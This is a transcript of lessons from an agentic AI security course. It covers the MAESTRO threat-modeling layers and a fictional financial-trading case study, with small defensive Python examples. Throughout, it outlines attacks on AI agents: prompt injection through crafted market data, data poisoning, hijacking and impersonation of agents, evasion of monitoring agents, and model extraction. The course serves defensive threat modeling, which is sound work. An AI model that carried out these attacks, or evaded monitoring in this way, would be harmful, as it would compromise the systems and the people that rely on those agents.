And lastly, the fourth one, which is the most obvious: securing your logging infrastructure. Actually, that should be number one; I should have put that at number one. You want to make sure that your logging infrastructure is hardened, that only the very minimum number of people have access to that logging infrastructure, and that the people who do have access have read-only access. Nobody should be able to write to that logging infrastructure, right, to try to hide and cover their tracks. And even the people who have read access should have only the very minimum which is needed, so that data cannot be leaked out. So these are all the best practices you need to think about.
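On that "nobody should be able to quietly rewrite the logs" point, one common pattern is a hash chain, where each log entry commits to the previous one, so tampering anywhere breaks verification. This is only a toy sketch of the idea, not a production logging system; the sample messages are invented.

```python
# Sketch: tamper-evident logging via a simple hash chain.
# Each entry stores the hash of the previous entry, so editing or deleting
# any past record breaks verification. Illustration only.
import hashlib
import json

def append_entry(log: list[dict], message: str) -> None:
    prev_hash = log[-1]["hash"] if log else "0" * 64
    entry = {"message": message, "prev_hash": prev_hash}
    entry["hash"] = hashlib.sha256(
        json.dumps({"message": message, "prev_hash": prev_hash}, sort_keys=True).encode()
    ).hexdigest()
    log.append(entry)

def verify_chain(log: list[dict]) -> bool:
    prev_hash = "0" * 64
    for entry in log:
        expected = hashlib.sha256(
            json.dumps({"message": entry["message"], "prev_hash": prev_hash}, sort_keys=True).encode()
        ).hexdigest()
        if entry["prev_hash"] != prev_hash or entry["hash"] != expected:
            return False
        prev_hash = entry["hash"]
    return True

audit_log: list[dict] = []
append_entry(audit_log, "agent-7 requested access to trading data")
append_entry(audit_log, "agent-7 access denied by policy")
print(verify_chain(audit_log))          # True
audit_log[0]["message"] = "nothing happened here"
print(verify_chain(audit_log))          # False - tampering detected
```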
Okay, now we are at layer six, which is the security and compliance layer. Now, this is a different layer. This cuts across all the other layers, because security, of course, you can't just restrict it to one layer, right? That's what we have been talking about. But it makes sure that the security controls and the compliance controls are present in all the AI agent operations. And this also covers using agentic AI as a security tool within your company, you know? So it includes things like agentic AI security automation and the governance of those AI agents. And, for example, if you remember, when we talked earlier about the use cases within cybersecurity, I talked about self-healing networks, right? Like AI-powered zero trust networks. So you have AI agents which are monitoring the network and adapting to it in real time, and any security attacks or security compromises are being responded to in real time. So you can have these
sort of things. What are the risks here? Quite a lot, actually. All those risks we talked about earlier, all of them, they can apply here also. Say somebody poisons the data of the security agents. This way, they will be producing either false positives or false negatives and mess up the visibility that you have. Or somebody evades them: somebody finds out a way of doing adversarial attacks which make them basically invisible to those security agents. They can compromise them: rogue agents. Somebody takes control of them and hijacks them; we talked about agentic AI hijacking. So they can use it to disable defenses, because of the access these agentic AIs have. Regulatory non-compliance: if your AI agents are not trained properly, you can actually violate privacy laws. Maybe they're accessing PII and they are not masking or encrypting it properly. Biases: we talked about bias earlier, I'm not going to repeat it. Lack of explainability: you don't know why the agentic AI is making these decisions. We talked about this. Remember, maybe the agentic AI is locking down users, disabling access, disabling security controls, or maybe making security controls very, very restrictive, but you don't know why it's doing that because you do not have visibility into the decision making. And lastly, model extraction. Similarly, basically attackers trying to understand why the agent is behaving like this and then extracting the logic behind it so that they can reverse engineer and bypass it, so that they are not visible to the security agents. So many mitigations
are there. I mean, all of them that we talked about earlier. Making sure that you have proper audit trails, doing audits of these AI agents and the training data, so that if somebody is poisoning that data, you are aware of it. Using adversarial training, basically doing red teaming of these security agents to make sure they are properly hardened. Deploying multi-layered security detection, which combines AI and your normal, traditional security tools. Implementing zero trust security and access control, so that nobody should be able to access the security agents' network. Continuously monitoring your AI agents, so not just having them monitor people, you're monitoring the security agents also. Putting in proper fail-safe mechanisms: what if a security agent is compromised that has access to all your sensitive data, all your sensitive systems? How do you override it, right? Integrating compliance monitoring into these security systems so that you also know that they do not have access to any sensitive or PII data. And limiting API queries, to make sure that if somebody is trying to reverse engineer the model, they will get blocked, because if somebody is hammering it continuously with API calls, you will detect it and stop it from happening.
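Here's a tiny sketch of the kind of per-caller rate limit that makes extraction-by-hammering harder. The window size, quota, and caller name are arbitrary numbers for illustration; a real deployment would sit this at the API gateway and raise a security alert when a caller keeps hitting the limit.

```python
# Sketch: a simple sliding-window rate limiter for model API queries.
# The numbers are illustrative only.
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 60
MAX_QUERIES_PER_WINDOW = 100

_recent: dict[str, deque] = defaultdict(deque)

def allow_request(caller_id: str, now: float | None = None) -> bool:
    now = time.time() if now is None else now
    q = _recent[caller_id]
    while q and now - q[0] > WINDOW_SECONDS:
        q.popleft()                       # drop timestamps outside the window
    if len(q) >= MAX_QUERIES_PER_WINDOW:
        return False                      # block and flag a possible extraction attempt
    q.append(now)
    return True

# Simulate one caller hammering the API.
blocked = sum(0 if allow_request("agent-42", now=i * 0.1) else 1 for i in range(200))
print(f"blocked {blocked} of 200 rapid queries")
```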
So we're almost at the end now. Now we're talking about layer seven, which is the agentic
AI ecosystem, the very top layer.
What is this one? This is the overall, broader environment, you know, where your AI agents are actually interacting now with web applications, users, and other AI systems. This is the layer where the vast majority of users will be interacting with agentic AI. This can be the AI marketplaces where you're getting these AI agents, multi-agent networks, enterprise automation platforms. I mean, the use cases are endless. And this is where the AI agents are doing their magic, you know, their autonomous decision making, maybe they're doing transactions, interactions. And this is where you really have to think about all the new types of security risks that we talked about earlier. And I really like this
diagram from OWASP again. This is more of a multi-agent network, and this is like a hierarchy, you know, your supervisor agent, which is looking at multiple agents, and they are interacting with people, interacting with devices. All those things you have to think about when you're doing threat modeling. And the risks that we talked about earlier, like misalignment. Compromised agents: basically attackers injecting their own malicious agents into the network, into the ecosystem, which can trick users. An attacker impersonating an agent: you know, maybe an attacker accesses the digital certificate, inserts himself, and mimics an AI agent. So you're thinking you're interacting with a legitimate AI agent, but it's actually the attacker, right? And similarly, the attacker stealing or manipulating the agent credentials; maybe they get access to the digital certificate. Agent tool misuse: somebody compromises an AI agent and makes it do unauthorized actions. Agent goal manipulation, we talked about this earlier, misalignment, where either by the attacker or because you did not give the instructions properly, you end up with misaligned actions, where the AI agent goes off on its own journey, you know. It's not following what you told it to do, and that can have a massive, massive impact, as we saw earlier. And even this list is not complete yet, because this is where the majority of
the attacks will be happening. Marketplace manipulation: if you are getting your agentic AI from a marketplace, somebody is putting in fake reviews, fraudulent ratings, to allow their fake AI services to gain market dominance. This is nothing new if you've ever downloaded apps from the Android store. You know how malicious apps are somehow promoted there. All these things are very much possible. Integration risks: basically how the APIs or the applications, the agents, are talking to each other. Weaknesses in APIs or software development kits can allow attackers to exploit this AI-to-AI interaction. You know, compromising the agent registry: agents are being stored somewhere, right? Maybe they modify AI listings so that they can put their own rogue agents there. Malicious agent discovery: pushing their own agents to the top of the marketplace and suppressing the legitimate ones. So all these sorts of attacks you have to think about. The mitigations are massive; I can only list a
few. But putting in proper agent authentication and trust verification, you know, putting in some sort of cryptographic private key and public key scheme so that only authorized agents can be injected. Detecting the behavior: basically, monitoring the AI systems, the agentic AI, to flag any compromised or deceptive AI agents. Securing the AI integrations and API controls. Goal alignment and governance, we talked about this before: making sure that the AI is always aligned to the goals, and if misalignment is happening, then you at least have human beings who can override it. Having a decentralized AI reputation system, so you can verify the AI's credibility not through the ratings, but through long-term performance. So there's a trust system there which the attackers cannot manipulate. Tamper-proofing your agent registry, so putting in controls like blockchain-based validation, so there's like a whole ecosystem of trust. Somebody cannot just push an agent to the top of the pile and override your governance. And making sure that the marketplace is resilient. So this will be more on the marketplace side, but just like the Android marketplace is monitored, you have fraud detection algorithms that let you know that this AI agent is not trusted. And, of course, secure AI deployment and self-healing, similar to what we have in DevOps, so that the AI can self-repair and roll back to mitigate the damage from compromised AI agents. These are just a few of the mitigations which we can see.
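To make the "cryptographic private key and public key, so that only authorized agents can be injected" point a bit more tangible, here's a minimal sketch using Ed25519 signatures from the `cryptography` package. The agent name, the publisher, and the manifest format are invented for the example; this is an illustration of the signing idea, not a specific marketplace's mechanism.

```python
# Sketch: agent identity via Ed25519 signatures (requires the `cryptography` package).
# A registry would only accept agents whose manifests verify against a known public key.
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.exceptions import InvalidSignature

# The legitimate agent publisher generates a keypair once.
private_key = Ed25519PrivateKey.generate()
public_key = private_key.public_key()

manifest = b'{"agent": "omni-trader-v2", "publisher": "example-corp"}'
signature = private_key.sign(manifest)

def is_trusted(manifest: bytes, signature: bytes) -> bool:
    try:
        public_key.verify(signature, manifest)
        return True
    except InvalidSignature:
        return False

print(is_trusted(manifest, signature))                      # True: genuine agent
print(is_trusted(b'{"agent": "evil-clone"}', signature))    # False: impostor rejected
```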
So now I hope you've understood how powerful MAESTRO is compared to the other threat modeling frameworks, because it is based purely on agentic AI, and that's what makes it so powerful. So this was a long lesson, but I just wanted to show you the power of MAESTRO. It gives you a very, very good layered architecture, and it addresses the agentic AI risks we talked about, but it does it in a very structured manner. So I want you to really go through this lesson multiple times so that you have a very good understanding. I will also link the MAESTRO framework, from the Cloud Security Alliance, to the lesson so you can take a look at it. Thank you very much. And now, what we're going to do is apply MAESTRO to a case study to see how it works in practical reality. Thank you very much, and I'll see you in the next lesson.
22. 21 - Threat Modeling Case Study: Hello, everybody.
Welcome to this lesson. Now we're almost at the end of the course. Now you have a good idea of agentic AI risks and the different types of risks that emerge at the different layers. So what I'm going to do is a case study, because if you've ever taken any of my courses, I don't like to just talk about a particular framework. I always like to show it being implemented as part of a case study, so you get a better idea of the practical implementation, as opposed to me just talking and talking and talking. That's just boring, honestly speaking. So what are we going to cover? We're going to apply MAESTRO in a practical but theoretical environment, not an actual real-world environment, but a case study. And we're going to see the step-by-step approach for how to practically implement MAESTRO for agentic AI threat modeling. So just a quick recap. I'm sure you have taken the previous lessons; if you haven't, then please go back and watch them. Don't jump directly to this lesson. But these are the seven layers which we talked about: foundation model, data operations, agentic frameworks, deployment infrastructure, evaluation and observability, security and compliance, and the agent ecosystem, from layer one to layer seven, where we assess and mitigate the different risks that are there. So how do we implement it? Now, we know the seven layers, right? So let's assume you have an agentic AI system. The first step you want to do is decompose the system. You want to break it down into the seven-layer architecture, right? Because if you don't know which component fits at what layer, break it down into that MAESTRO framework, and then do layer-specific threat modeling. So use the layer-specific threat landscapes that we talked about earlier to find out what the risks are, and then you can tailor the specific threats to your system. This way, you'll know, okay, what threats exist at what layer and what controls I have to implement. Cross-layer threat identification: there are certain risks at one layer that will impact the agentic AI at a different layer. And we will see an example of this, but this is very, very important to consider. There are certain things which are cross-layer, like security. Security is implemented at all layers, right? It's not just one layer. It's not just layer six, I believe it was, right? It crosscuts across all layers. Then you do the risk assessment, where you assess the likelihood and impact. Whatever likelihood and impact matrix you like to use for risk assessment, you know, high, medium, low, qualitative, quantitative, it doesn't matter. You can use whichever one you want, okay? And then we do the mitigation, and then monitor. That's pretty much it. It's
very, very straightforward. If you've ever done risk assessments or threat modeling, it is pretty much the same concept. Nothing is drastically different here.
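Before we jump into the example, here's one way you could keep such a layer-by-layer threat register in code. The layer names follow MAESTRO, while the sample threat and mitigation entries are placeholders you would replace with your own; this is just a sketch of the structure, not a required format.

```python
# Sketch: a minimal MAESTRO-style threat register.
# Layer names follow the framework; the sample entries are placeholders.
from dataclasses import dataclass, field

@dataclass
class Threat:
    description: str
    likelihood: str   # e.g. "low" / "medium" / "high"
    impact: str
    mitigation: str

@dataclass
class Layer:
    name: str
    threats: list[Threat] = field(default_factory=list)

register = [
    Layer("1. Foundation model", [Threat("Prompt injection via market signals", "medium", "high",
                                         "Adversarial training, model monitoring")]),
    Layer("2. Data operations", [Threat("Poisoned historical trading data", "medium", "high",
                                        "Cryptographic signing of feeds, hardened pipelines")]),
    Layer("3. Agent frameworks", []),
    Layer("4. Deployment infrastructure", []),
    Layer("5. Evaluation and observability", []),
    Layer("6. Security and compliance", []),
    Layer("7. Agent ecosystem", []),
]

for layer in register:
    for t in layer.threats:
        print(f"{layer.name}: {t.description} -> {t.mitigation}")
```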
So let's take
an example, right? So there is a company called Omnitech Solutions. They are like a global tech giant, right, specializing in AI-powered financial automation. So they were using AI heavily for financial automation, you know, trading and helping banks, and now they are moving on to agentic AI. So they've recently deployed agentic AI to optimize real-time trading strategies, you know, automate financial operations, and detect fraud. Now, they are deploying agentic AI, and this system consists of a multi-agent environment: multiple autonomous agents that are interacting dynamically with financial data, clients, and regulatory compliance, right? However, naturally enough, the leadership team, especially the CSO and the AI security team, are kind of worried about the risk of deploying an AI with such a level of autonomy, especially in a mission-critical environment, right? They are probably afraid of potential threats such as adversarial attacks, data poisoning, goal misalignment, and AI manipulation. So to make sure that they understand the risk, they decide to use the MAESTRO framework for doing proper threat modeling and risk mitigation. So this is what the
environment is. The first thing they want to do is, like I said, system decomposition. They want to break it down into the seven MAESTRO layers, because by decomposing the AI system into these layers, they can now identify threats and apply controls specific to each layer. So the first one would be the foundation model. This is where your core AI model sits, whatever LLM you're using for, like, trading or fraud detection; you want to cover them there. Data operations: the market feeds which are coming in and feeding into the application, the trading history, compliance reports, retrieval augmented generation. All these things come here. Agentic frameworks: whatever agentic framework they used to build these agents. Maybe it was open source, maybe it was enterprise level, but consider, is it hosted outside? Is it hosted on-prem? Whatever they're using. Deployment infrastructure: whatever cloud they're using, maybe they're using AWS or Azure. I've written AWS here. But yeah, whatever cloud infrastructure it is, is it properly hardened? Evaluation and observability: how do we know what's going on? How do you know what the agentic AI is doing? Is it doing it properly? Is it being compromised? Is it deviating from its goals, right? All these things you have to understand. Security and compliance, very important. It cross-cuts across all the layers, right? I've only written security policies here, but we are not just talking about security policies. Maybe you have a security agent also deployed that is making sure that all the trading is happening as per regulatory guidelines, right? And lastly, the ecosystem. This is where the agents will be interacting with external parties: financial brokers, traders, or other agents. So this is how they would break it down, right? You can make it more detailed if you want, but this is at least a good start. Then, okay, one by one, we want to look at the
risks which are there. Now, I've written the mitigation here with this example, because obviously you would do this later on; it's just for the purposes of making it easier to understand that I put the mitigation in here. So the first one would be the foundation model: is somebody manipulating the AI model, right, to make incorrect financial decisions? Somebody doing prompt injection, or maybe, like the example written here, they inject specially crafted data into the market signals. Why? To trick the AI into making bad trades, bad decisions. How do we mitigate it? We do something like adversarial training, where you test and harden the AI system by running these sorts of scenarios against it to see how resilient it is. Is it able to withstand them, or does it start making wrong decisions because it's not properly hardened against these sorts of attacks? And also using model monitoring, so that if the underlying LLM which the agentic AI is using is deviating, you are able to detect it. Layer two would be the
data operations layer. This is where, of course, data poisoning comes in. That's always the biggest risk, right? Because what is happening is maybe you are using some sort of market feed. Maybe you're using retrieval augmented generation, some vector database, to feed and give more context to the agentic AI, right? Now, here, attackers can do data poisoning to mess up the decision making. And the example threat I've written is that attackers can maybe inject manipulated historical trading data. So the trading data is incorrect; it's not representing what actually happened, and that messes up the predictions and the trades which are happening, right? So you would verify the data integrity using cryptographic signing, to make sure that the data is coming from an authorized source, and harden the data pipelines to make sure nobody can access them in an unauthorized manner.
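As a rough illustration of what cryptographic signing of a market feed could look like, here's a sketch using an HMAC shared between the data provider and the consumer. The secret, the record format, and the key handling are all simplified assumptions for the example.

```python
# Sketch: verifying that a market-data record really came from the trusted feed.
# Uses an HMAC with a shared secret; key management is out of scope here.
import hmac
import hashlib
import json

SHARED_SECRET = b"demo-secret-do-not-use-in-production"

def sign_record(record: dict) -> str:
    payload = json.dumps(record, sort_keys=True).encode()
    return hmac.new(SHARED_SECRET, payload, hashlib.sha256).hexdigest()

def verify_record(record: dict, signature: str) -> bool:
    return hmac.compare_digest(sign_record(record), signature)

tick = {"symbol": "ACME", "price": 101.25, "ts": "2025-01-01T09:30:00Z"}
sig = sign_record(tick)

print(verify_record(tick, sig))    # True: untampered record
tick["price"] = 1.25               # attacker poisons the feed
print(verify_record(tick, sig))    # False: rejected before it reaches the agent
```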
Layer three would be the agentic framework layer. This is the framework that you're using. Nine times out of ten, you would not be using your own agentic AI framework. You will be relying on something like, I don't know, I talked about CrewAI, or any multi-agent framework that you're using. What if somebody compromises that framework, right? A supply chain attack, similar to what happened with SolarWinds. A third-party AI library used in model training, maybe that contains a hidden backdoor. So what can you do? You have to make sure that you have a good supply chain security risk management program, and that extends to your AI frameworks also. Use something like a software bill of materials to make sure that you know what your critical dependencies are and what the vulnerabilities are. Track them; make sure that you are aware if something is happening. Do your own pen testing of the AI agents which are built using this framework so that you understand what the exposure is. And make sure these agents only have the least amount of permissions that they need. If your AI agent is only being used for reading data and you've given it full admin access, yeah, that's definitely not security best practice.
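On the software bill of materials point, even a very small script that inventories what your agent framework actually pulls in is a useful starting place. This sketch just lists the installed Python distributions; a real SBOM would use a standard format such as CycloneDX and feed a vulnerability scanner, which is beyond this illustration.

```python
# Sketch: a bare-bones inventory of installed Python dependencies.
# A real SBOM would use a standard format and include vulnerability lookups.
from importlib.metadata import distributions

def dependency_inventory() -> list[tuple[str, str]]:
    items = []
    for dist in distributions():
        name = dist.metadata.get("Name") or "unknown"
        items.append((name, dist.version))
    return sorted(set(items))

if __name__ == "__main__":
    for name, version in dependency_inventory():
        print(f"{name}=={version}")
```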
Layer four: deployment infrastructure. This is where your cloud infrastructure, which is hosting the agentic AI (I talked about AWS), gets compromised. And that allows attackers to take over the agentic AI console and hijack the AI agents, right? Maybe the attacker can gain access to the Kubernetes cluster running the agents and modify your trading strategies. So what can you do? Enforce principles like zero trust architecture, where every request is authenticated. You want to make sure that nobody can bypass it and that no AI agent is implicitly trusted. Every request has to be authenticated. Harden your containers, harden your cloud infrastructure, and use something like a cloud security posture management solution.
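As a toy illustration of "every request is authenticated", here's a sketch where each agent-to-service request carries an HMAC over its body, and anything unsigned, mis-signed, or from an unknown agent is rejected. The agent names, keys, and request format are invented for the example.

```python
# Sketch: zero-trust style request check - no agent request is trusted
# unless it carries a valid signature from a key we issued. Illustrative only.
import hmac
import hashlib

AGENT_KEYS = {"trade-agent-1": b"key-one", "risk-agent-2": b"key-two"}  # issued at onboarding

def sign(agent_id: str, body: bytes) -> str:
    return hmac.new(AGENT_KEYS[agent_id], body, hashlib.sha256).hexdigest()

def handle_request(agent_id: str, body: bytes, signature: str) -> str:
    key = AGENT_KEYS.get(agent_id)
    if key is None:
        return "rejected: unknown agent"
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, signature):
        return "rejected: bad signature"
    return "accepted"

body = b'{"action": "read", "resource": "positions"}'
print(handle_request("trade-agent-1", body, sign("trade-agent-1", body)))  # accepted
print(handle_request("trade-agent-1", body, "forged"))                      # rejected: bad signature
print(handle_request("rogue-agent", body, "anything"))                      # rejected: unknown agent
```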
Layer five: evaluation and observability. So here, this is all about visibility into the behavior
of the AI agents, right? And here, maybe the attackers start looking at AI evasion attacks, where they can manipulate the AI behavior without triggering a security alert. So they are trying to mess up the AI decision patterns by sending very, very subtle queries, right? And so what can you do here? You can implement real-time behavioral monitoring: there's a baseline of how the AI agents make decisions, and suddenly that baseline is changing. You're seeing that baseline changing and you say, hey, this is not normal, what's going on here? So this is where you want to put in alerts, and you want to make sure that every decision the agent is making is explainable. So when it starts making completely different decisions, you're able to step back and say, hey, this decision does not make sense, right? So that would be the mitigation. Layer six is, of course, security and compliance. What is the risk here? Not just losing security observability, but also your agentic AI violating financial regulations, right? Breaking compliance due to misalignment with compliance rules. Like the example I gave earlier: the agentic AI is told to just prioritize profit over everything else, and it says okay, and it completely ignores all the trading regulations, the financial guidelines, and it starts doing trades that violate market regulations, and that can become a major, major reputational risk. So what can you do? Make sure that the compliance rules are hard-coded. These are not something that the AI can override by itself. And make sure that you're doing continuous regulatory audits, using automated compliance monitoring.
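Here's a hedged sketch of what "the compliance rules are hard-coded, not something the AI can override" might look like: whatever trade the agent proposes gets checked against fixed limits before anything is executed. The specific limits, symbols, and order fields are invented for the example.

```python
# Sketch: hard-coded compliance guardrails the agent cannot override.
# The limits and fields are invented for illustration.
MAX_ORDER_VALUE = 1_000_000          # hard cap per order
RESTRICTED_SYMBOLS = {"SANCTIONED_CO"}

def compliance_check(order: dict) -> tuple[bool, str]:
    if order["symbol"] in RESTRICTED_SYMBOLS:
        return False, "symbol is on the restricted list"
    if order["quantity"] * order["price"] > MAX_ORDER_VALUE:
        return False, "order exceeds the hard value cap"
    return True, "ok"

def execute_trade(order: dict) -> None:
    allowed, reason = compliance_check(order)   # runs outside the agent's control
    if not allowed:
        print(f"BLOCKED and logged for review: {reason}")
        return
    print(f"executing {order['quantity']} x {order['symbol']}")

execute_trade({"symbol": "ACME", "quantity": 100, "price": 50.0})        # executes
execute_trade({"symbol": "ACME", "quantity": 100_000, "price": 50.0})    # blocked: value cap
```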
And layer seven is the agentic ecosystem. This is where the whole ecosystem of the AI agents is, where AI agents are interacting with the brokers, with the traders, with other agents. And here, of course, come the AI agent risks: rogue agents, agentic AI hijacking, agents getting impersonated or manipulated by the attackers. So an attacker can create a fake AI agent that mimics Omnitech's legitimate AI bots and disrupts financial transactions. He inserts it into the ecosystem, and traders are interacting with it without knowing that this is a rogue one. So what can you do? You can implement very strong identity and authentication mechanisms so that nobody is able to hijack an agent, using cryptographic agent signatures, so that traders and brokers know that this is the signature for an authentic agent from Omnitech. So nobody can just pretend to be an agent. Same as you see in the Android app store and all that: how do you verify that an app is verified? So these were the risks that we looked at. Now, what about the cross-layer threat identification? This is a very important part of MAESTRO, like I said earlier. You mitigate threats at the individual layer, but there are threats that can propagate, that can cut across layers, right? So for example, data poisoning. Maybe attackers inject manipulated data at layer two, which is the data layer, but then that would poison the AI model at layer one, right, causing incorrect trades to happen. Remember, in agentic AI all the layers are very closely integrated with each other. What can you do? Make sure that the monitoring is happening at all layers, and that it can detect anomalies in both the data inputs and the outputs before final decisions are executed. So this is one way of finding out if data poisoning is happening across layers. What else is there? Infrastructure compromise leading to AI manipulation. Like I said, the cloud: if somebody is able to bypass the security measures in your cloud, maybe compromise your AWS infrastructure, he can then modify the agentic AI framework which you've deployed, inserting backdoors, right, inserting his own agents. So you need to make sure that you have end-to-end encryption, and you have immutable infrastructure that prevents any unauthorized changes from happening. Nobody can just do ClickOps and start deploying infrastructure; they need to go through the authorized pipeline. And you've hardened your cloud security infrastructure. What else is there? AI model extraction via the API. So at layer seven, attackers are querying the API excessively through the agent ecosystem to reverse engineer the foundation model, which sits at layer one. This is just to show you how these threats can cut across layers. What can you do? We've talked about this before. Implement rate limiting and API request monitoring, so that if somebody is continuously querying your API, you will know. And you can use differential privacy to obscure, to inject noise, so that nobody can just find out what data was being used.
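For the differential-privacy point, the core trick is adding calibrated noise to what the API returns, so repeated queries don't leak the underlying data. Here's a toy sketch of a Laplace mechanism; the epsilon value and the query being protected are purely illustrative.

```python
# Sketch: Laplace mechanism - noisy answers make it harder to reverse engineer
# the underlying data by hammering the API. Epsilon and the data are illustrative.
import random

def noisy_count(true_count: int, epsilon: float = 0.5, sensitivity: float = 1.0) -> float:
    scale = sensitivity / epsilon
    # The difference of two exponential samples with the same rate is Laplace noise.
    noise = random.expovariate(1 / scale) - random.expovariate(1 / scale)
    return true_count + noise

matching_trades = 42   # the true answer the attacker is probing for
for _ in range(3):
    print(round(noisy_count(matching_trades), 2))   # each query returns a slightly different value
```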
So this is just to show you how you can do it. In the project which we're going to be doing at the end, I want you to inject your own risks into the threat model, so you get an idea also. But now
we are at phase four, which is the monitoring. Now, Omnitech is not stupid, hopefully. They realize that AI risks change over time, right? So what they have done is they've implemented continuous security measures like red teaming. So they've hired a company that is continuously hammering these AI agents to check how resilient they are. They have developed an incident response plan; they realize that incidents can always happen, so how do we make sure those are mitigated? And they are doing automated security updates. So basically, making sure that the threat model is not static. It's not a one-time activity. You keep on doing it as new threats come out. So by adopting this sort of framework, Omnitech has successfully secured its agentic AI driven financial automation platform, and now they have much more, what do you call it, assurance against this. Their financial data integrity is maintained, regulatory compliance is ensured, and continuous AI monitoring is also there. So remember that, while the traditional threat models are good, they do not address agentic AI's unique risks. That's why you need a methodology like MAESTRO, which captures the agentic AI specific risks such as model poisoning, agentic AI manipulation, and hijacking, and which specifically addresses multi-agent environments where AIs can collaborate with each other, right? So I hope this was useful to you. We're almost at the end of the course now. Thank you very much, and I'll see you at the conclusion of this course.
23. 22 - Wrapping Up: Hi, everybody.
Welcome, welcome now. This is the last
lesson of the course. I hope you enjoyed this lesson, and I hope I contributed to increasing your
knowledge about agentic AI. If not, I'm extremely sorry that you had to listen
to me for so long. But just to understand: the future is very much here. Agentic AI is not in the future. It is here right now. It is being used and implemented. There are multiple waves of AI, I always say. So the first one was where AI was used for forecasting and data-driven decision making, right? Now, the second one was the generative AI wave, which is where we saw the amazing content that could be generated using tools like ChatGPT, Claude, Gemini, right, which was a game changer. And now we're at the third wave, which is AI
independently performing complex tasks without any
constant human oversight, interacting with other agents. We are at, like,
a very key moment in technological history. And this is no joke.
This is not hype, whether you like it or
not, agentic AI is here. And I always say I always show this slide whenever
I talk about AI, that there are three
levels of AI acceptance. First, people who are terrified that AI is going to take their job, but they're so scared, or too disinterested, to dig any deeper or use it to their advantage, right? The second one is, like, they realize that AI is here, but they don't know how much AI has changed, like how much life has changed over the past, like, two, three years, I would say. They're just worried; they're not taking any action. And the last one are people like you, who are investing in yourselves by taking this course and have decided to dive right in and learn how much they can leverage AI
for their benefit. The new workforce, the new
way people will be working is shifting from human beings using AI tools to human
beings managing AI teams now. And here you will have
AI agents that will be specializing in roles
like customer service and IT support, and human beings will be moved away from these tasks, but you will still have jobs. Don't worry. New job roles are emerging, like AI cybersecurity, AI risk, AI agent trainers, workflow designers, and AI ethics. Businesses will need AI
strategy and security teams to oversee how these things are
collaborating and evolving. So it is a very exciting
time to be alive. I don't want you to be worried. I want you to be the person
on the very right here, which is happy and ready for this new environment
that is coming. How to keep learning? Please do not consider this course to be the be-all and end-all. Agentic AI will keep on changing, keep on evolving. Create your own agent; I always say, instead of just being theoretical, create your own agent using any of the frameworks that are there. Agentic AI is here very much to stay. Stay updated with these
sort of industry trends. The project which I talked about, the case study which I showed you using MAESTRO: I want you to go through it again, add your own threats and risks using the layers that we talked about, and put in your own mitigations, so that you get a very good handle on it. Otherwise, you will simply forget what I told you, honestly speaking, and there'll be no point. You'll just forget about it, and you would have just listened to me talking for two or three hours and not
apply this knowledge. So congratulations. You have reached the
end of this course. Thank you very much
for listening to me. I'm happy to connect
with you anytime. I'm there on Substack, LinkedIn, and YouTube. Twitter, I'm not that active on, but please feel free to reach out to me. I'll put in the links there. Thank you very much for listening to me. Please do leave a review for this course if you liked it, or even if you thought this was a very bad course. Always happy to get feedback. Thank you very much, and I'll
see you in my next course.